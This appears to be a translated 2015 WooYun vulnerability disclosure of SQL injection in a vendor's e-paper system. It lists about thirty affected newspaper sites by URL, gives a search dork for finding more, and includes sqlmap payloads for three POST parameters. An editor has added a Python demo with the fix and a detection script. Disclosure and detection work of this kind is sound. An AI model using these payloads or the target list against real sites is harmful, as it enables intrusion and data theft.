
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0118290

Title: Generic SQL injection in a digital newspaper (e-paper) system, affecting many well-known newspapers

Vendor: 北京紫新报通科技发展有限公司

Author: 路人甲

Submitted: 2015-06-05 10:29

Fix time: 2015-09-08 08:56

Disclosed: 2015-09-08 08:56

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)



Vulnerability details

Disclosure status:

2015-06-05: details sent to the vendor, awaiting vendor response
2015-06-10: vendor confirmed; details visible to the vendor only
2015-06-13: details opened to third-party security partners
2015-08-04: details opened to core white hats and domain experts
2015-08-14: details opened to regular white hats
2015-08-24: details opened to intern white hats
2015-09-08: details made public

Brief description:

Generic SQL injection in a digital newspaper (e-paper) system, affecting many well-known newspapers

Detailed description:

Stack: JSP + MySQL
Search keyword (Google dork): inurl:/epaper 北京紫新报通科技发展有限公司



Partial list of affected sites:
中国医学论坛报: http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm
增城日报: http://zcrb.zcwin.com/epaper/
孝感日报: http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm
定州日报: http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD%C8%D5%B1%A8&pubdate=2014-07-24&pagename=01&pubpath=aper/dzrb/html
中国会计报: http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm
丹阳日报: http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html
濮阳日报: http://www.pyxww.cn:8080/epaper/paper.jsp?papername=%E5%A7%D1%F4%C8%D5%B1%A8&pubdate=2015-03-05&pagename=01&pubpath=pyrb/html
永新周刊: http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm
中华工商时报: http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm
拉萨晚报: http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm
今日龙泉: http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm
淮业日报: http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm
丽水广播电视: http://xyz.lsol.com.cn/epaper/search/index.jsp
柳州日报: http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm
松阳日报: http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm
南宁日报: http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm
同仁日报: http://58.42.132.75:8080/epaper/trrb/html/
北海晚报: http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm
粮油市场报: http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm
无锡新周刊: http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm
丹阳日报: http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm
孝感日报: http://szb.xgrb.cn:9999/epaper/
中国医学论坛报: http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm
保山日报: http://www.baoshandaily.com:8080/epaper/search/index.jsp
邵阳日报: http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm
娄底日报: http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm
生态新区: http://61.153.66.148/epaper/search/index.jsp
中国经济导报: http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm
庆元日报: http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm
河南法制报: http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm

Proof of vulnerability:

SQL injection 1:
Vulnerable file: epaper/comments/comments_add.jsp
Injected parameter: papername
Example target: http://epaper.cmt.com.cn/epaper/comments/comments_add.jsp?dowhat=addsave

sqlmap output (long lines rejoined):

Place: POST
Parameter: papername
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' RLIKE IF(2847=2847,0x254235254134254431254634254338254435254231254138,0x28) AND 'SolV'='SolV&pubdate=2015-06-04&pagename=02&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' AND (SELECT 6014 FROM(SELECT COUNT(*),CONCAT(0x3a7077723a,(SELECT (CASE WHEN (6014=6014) THEN 1 ELSE 0 END)),0x3a716f743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'agBy'='agBy&pubdate=2015-06-04&pagename=02&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7077723a,0x4650704743526f6f4d42,0x3a716f743a),NULL,NULL,NULL,NULL,NULL#&pubdate=2015-06-04&pagename=02&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' AND SLEEP(5)#&pubdate=2015-06-04&pagename=02&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads
---
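Added example (written for this edit, not code from the report or from the vendor's product): a Python/SQLite stand-in for the query that comments_add.jsp evidently builds from papername, pubdate, pagename and contentid. The JSP source is not on the page, so the concatenated query, the table layout and the rows are assumptions and constructed data; what is taken from the report is the set of injectable fields and sqlmap's :pwr: / :qot: delimiters (the 0x3a7077723a and 0x3a716f743a literals in the payloads). sqlmap's MySQL-only syntax is replaced by portable SQL: the RLIKE trick (IF(cond, original value, 0x28) turns the regex pattern into "(" and so into a query error whenever cond is false) becomes a plain AND '1'='1' / AND '1'='2' pair, and the '#' comment becomes '-- '. The block also shows the fix the report leaves blank, bound parameters.

```python
# Added example: a Python/SQLite stand-in for the query behind comments_add.jsp.
# Not code from the original report or the vendor's product. The JSP source is
# not on the page; the assumption, supported by sqlmap's four positive
# techniques, is that the POST fields are concatenated into an SQL string.
# Table layout and rows are constructed sample data.
import sqlite3

# sqlmap brackets what it extracts with random-looking delimiters; in the
# report they are 0x3a7077723a and 0x3a716f743a, i.e. ":pwr:" and ":qot:".
MARK_OPEN, MARK_CLOSE = ":pwr:", ":qot:"


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one paper, two pages, three stories, one user."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE content(
            contentid INTEGER PRIMARY KEY,
            papername TEXT, pubdate TEXT, pagename TEXT, title TEXT);
        INSERT INTO content VALUES
            (58, 'DanyangDaily', '2015-06-04', '02', 'wheat harvest only 20% done'),
            (59, 'DanyangDaily', '2015-06-04', '02', 'council meeting'),
            (60, 'DanyangDaily', '2015-06-04', '01', 'front page');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


def lookup_vulnerable(conn, papername, pubdate, pagename, contentid):
    """String concatenation: every one of the four fields is an injection point."""
    sql = ("SELECT contentid, title FROM content"
           " WHERE papername='" + papername + "'"
           " AND pubdate='" + pubdate + "'"
           " AND pagename='" + pagename + "'"
           " AND contentid='" + contentid + "'")
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, papername, pubdate, pagename, contentid):
    """Bound parameters: the values never become part of the SQL text."""
    sql = ("SELECT contentid, title FROM content"
           " WHERE papername=? AND pubdate=? AND pagename=? AND contentid=?")
    return conn.execute(sql, (papername, pubdate, pagename, contentid)).fetchall()


def extract_marked(rows):
    """What sqlmap does with a UNION response: pull out text between the markers."""
    found = []
    for row in rows:
        for cell in row:
            cell = str(cell)
            start, end = cell.find(MARK_OPEN), cell.find(MARK_CLOSE)
            if start != -1 and end > start:
                found.append(cell[start + len(MARK_OPEN):end])
    return found


# Constructed requests mirroring the report's techniques that SQLite can run.
NORMAL = ("DanyangDaily", "2015-06-04", "02", "58")
BOOL_TRUE = ("DanyangDaily", "2015-06-04", "02", "58' AND '1'='1")
BOOL_FALSE = ("DanyangDaily", "2015-06-04", "02", "58' AND '1'='2")
# '-- ' plays the role of sqlmap's '#': it comments out the rest of the query.
UNION = ("DanyangDaily", "2015-06-04",
         "02' UNION ALL SELECT username, '" + MARK_OPEN + "' || password || '"
         + MARK_CLOSE + "' FROM users-- ",
         "58")


def demo():
    """Run every request against both handlers and return the row sets."""
    conn = build_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, *NORMAL),
        "vuln_true": lookup_vulnerable(conn, *BOOL_TRUE),
        "vuln_false": lookup_vulnerable(conn, *BOOL_FALSE),
        "vuln_union": extract_marked(lookup_vulnerable(conn, *UNION)),
        "fixed_normal": lookup_fixed(conn, *NORMAL),
        "fixed_true": lookup_fixed(conn, *BOOL_TRUE),
        "fixed_union": lookup_fixed(conn, *UNION),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Run it with python3: lookup_vulnerable returns different row sets for the true and false payloads (the signal sqlmap's boolean-based check keys on) and leaks the users table through the UNION, while lookup_fixed returns the same single row for the normal request and nothing for any payload. The same change applies to contentid and pagename, which the next two sections show are injected in exactly the same way.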


Databases enumerated:

available databases [4]:
[*] epaper
[*] epaper_new
[*] information_schema
[*] mysql


SQL injection 2:
Vulnerable file: epaper/comments/comments_add.jsp
Injected parameter: contentid

Place: POST
Parameter: contentid
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&contentid=58' RLIKE IF(5772=5772,58,0x28) AND 'xliE'='xliE&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&contentid=58' AND (SELECT 2218 FROM(SELECT COUNT(*),CONCAT(0x3a7077723a,(SELECT (CASE WHEN (2218=2218) THEN 1 ELSE 0 END)),0x3a716f743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fzjs'='fzjs&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&contentid=58' UNION ALL SELECT CONCAT(0x3a7077723a,0x4d466954494e534a4345,0x3a716f743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&contentid=58' AND SLEEP(5)#&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads
---




SQL injection 3:
Vulnerable file: epaper/comments/comments_add.jsp
Injected parameter: pagename

Place: POST
Parameter: pagename
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02' RLIKE IF(1930=1930,02,0x28) AND 'PlQG'='PlQG&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02' AND (SELECT 7282 FROM(SELECT COUNT(*),CONCAT(0x3a7077723a,(SELECT (CASE WHEN (7282=7282) THEN 1 ELSE 0 END)),0x3a716f743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'luHN'='luHN&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x3a7077723a,0x52624a57516c6b494e56,0x3a716f743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02' AND SLEEP(5)#&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsadads
---
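Added example, not code from the report: a detection check for the request shapes sqlmap left behind in all three sections above, usable as a WAF rule or a log-triage script at any of the listed sites. The POST field names come from the report, the body encoding is assumed to be GBK (that is what %B5%A4%D1%F4%C8%D5%B1%A8 decodes as), and the sample bodies are constructed, with the injected values copied from the report's payloads. It also decodes sqlmap's 0x... string literals so an analyst can read the markers and the random token sqlmap was looking for.

```python
# Added example: flag the sqlmap techniques recorded in the report on POST
# bodies to comments_add.jsp. Not code from the report or the vendor's product.
# Field names are from the report; sample bodies are constructed; the form is
# assumed to be GBK-encoded.
import re
from urllib.parse import parse_qsl

SIGNATURES = [
    ("boolean-blind RLIKE IF", re.compile(r"\bRLIKE\s+IF\s*\(", re.I)),
    ("error-based FLOOR(RAND(0)*2) GROUP BY",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bGROUP\s+BY\b",
                re.I | re.S)),
    ("union-based", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based SLEEP", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    # sqlmap closes boolean and error payloads with a random tautology, e.g. AND 'SolV'='SolV
    ("tautology suffix", re.compile(r"\bAND\s+'(\w+)'='\1", re.I)),
]
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def parse_form(body: str, encoding: str = "gbk") -> dict:
    """Decode an application/x-www-form-urlencoded body; undecodable bytes are replaced, not dropped."""
    return dict(parse_qsl(body, keep_blank_values=True, encoding=encoding, errors="replace"))


def classify_body(body: str) -> dict:
    """Return {param: [technique names]} for every parameter whose value matches a signature."""
    hits = {}
    for name, value in parse_form(body).items():
        matched = [label for label, rx in SIGNATURES if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def decode_hex_literals(value: str) -> list:
    """Turn MySQL 0x... literals back into text when they are printable ASCII."""
    out = []
    for h in HEX_LITERAL.findall(value):
        if len(h) % 2:
            continue
        raw = bytes.fromhex(h)
        if raw and all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


# Constructed sample bodies; the injected values are the ones in the report.
TAIL = "&title=t&guestcomments=on&clubuser=long1112&password=000000&content=nice+article"
SAMPLES = {
    "benign": "papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&contentid=58" + TAIL,
    "rlike": "papername=%B5%A4%D1%F4%C8%D5%B1%A8' RLIKE IF(2847=2847,"
             "0x254235254134254431254634254338254435254231254138,0x28) AND 'SolV'='SolV"
             "&pubdate=2015-06-04&pagename=02&contentid=58" + TAIL,
    "error": "papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&contentid=58'"
             " AND (SELECT 2218 FROM(SELECT COUNT(*),CONCAT(0x3a7077723a,(SELECT (CASE WHEN"
             " (2218=2218) THEN 1 ELSE 0 END)),0x3a716f743a,FLOOR(RAND(0)*2))x FROM"
             " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fzjs'='fzjs" + TAIL,
    "union": "papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02' UNION ALL SELECT"
             " NULL,NULL,NULL,NULL,CONCAT(0x3a7077723a,0x52624a57516c6b494e56,0x3a716f743a),"
             "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&contentid=58" + TAIL,
    "sleep": "papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02"
             "&contentid=58' AND SLEEP(5)#" + TAIL,
}


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        hits = classify_body(body)
        print(label, hits or "clean")
        for param in hits:
            print("   literals in", param, "->", decode_hex_literals(parse_form(body)[param]))
```

The tautology and RLIKE signatures are specific to sqlmap's default payload shapes; a hand-written injection would only trip the UNION, SLEEP or error-based patterns, so treat this as triage for the traffic this report describes rather than a general SQL injection filter. The decoded literals show why sqlmap's UNION probe is easy to spot in a response: it expects ":pwr:" and ":qot:" to bracket the random token (here RbJWQlkINV) somewhere in the page.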


Database user: root (the original report shows this only as a screenshot, which is not reproduced here)


Fix recommendation: (left empty by the reporter)

Copyright notice: when reproducing, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 17

Confirmed: 2015-06-10 08:54

Vendor reply:

CNVD has confirmed the situation described and has notified the site operator by email through its public contact channel; the operator will provide a fix and coordinate remediation with the affected user organisations.

Latest status:

None yet